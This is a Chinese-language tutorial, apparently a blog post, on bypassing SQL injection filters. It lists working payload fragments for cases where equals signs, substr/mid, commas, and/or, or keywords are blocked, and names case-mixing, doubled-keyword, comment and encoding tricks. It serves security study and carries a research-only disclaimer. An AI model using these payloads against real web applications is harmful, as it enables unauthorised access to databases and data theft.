SQL注入【ByPass总结】(八)

本文主要是介绍SQL注入【ByPass总结】(八)，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与学习之用，读者将信息做其他用途，由Ta承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

0、前言

本文是SQL注入分享终结前篇，整理一些针对ByPass替换方法，和对应SQL注入修复建议。最后一篇ByPass靶场5关实战，会有点难，包含写成wp前后我花了5~6小时，而且内容有些多，所以以单独一篇分享。希望对大家在学习理解SQL注入有帮助。

像Access，MSSQL、Oracle注入我自己也没做靶场实验就不做分享了，大家如果感兴趣的话，可以网上搜索了解学习下。

1、常见ByPass

1.1、等号被过滤

1. 使用 >, <, <> 替换
and ascii(substr(database(),1,1))>xxx2.采用like， rlike语句
and database() like 't%'
注： rlike的内容为正则，正则写法与java一致，需要转义，例如’ \n’ 需要使用’ \\n’3.采用regexp,in,between
and database() regexp 'test.*'
Regexp函数使用方法与rlike类似，都是正则匹配
and database() in ('test')
and substr(database(),1,1) BETWEEN 't' and 't'

1.2、substr、 mid被过滤

1.采用locate,position,instr,lpad,rpad
and LOCATE('e',database())in('2')
and LOCATE('t',database(),4)in('4')注：
locate(str1,str2)
返回str1字符串在str2里第一次出现的位置，没有返回0
Locate(str1,str2,pos)
返回str1字符串在str2里pos（起始位置）出现的位置，没有返回0
pos必须大于第一次出现的位置，才能显示第二次出现的位置

1.3、逗号被过滤

1.采用%2C
id= -1' union select 1%2C2%2C3--+2.采用from xx for xx, from(x)
and substr(database()from 2 for 1)='e'

1.4、and/or被过滤

1.使用&&、 ||或者like
&& substr(database(),1,1)='t'
|| substr(database(),1,1)='t'
like+if(substr(database(),1,1)='s',1,0)=1--+（此处的like需要结合判断函数使用）注：在mysql中 and与or 是可以用 &&和||相互代替的
如： and 1=1 ->&& 1=1 or 1=1 ->||1=1
不过在oracle中， ||为拼接字符，如： ’a’||’b’->’ab’，相当于mysql中的concat()

1.5、关键字被过滤

1.大小写绕过，如User()， dAtaBASE()， SelEct等。
2.只过滤一次时，双重关键字绕过，如selselectect， ununionion， oorr等。
3.and/or+空格被替换为空时， andand+空格（oror+空格）绕过。
4.注释符绕过， //, -- , /**/, #, --+, -- -, ;,%00,--a， /*!*/。
5.编码绕过：如URLEncode编码， ASCII,HEX,unicode编码绕过。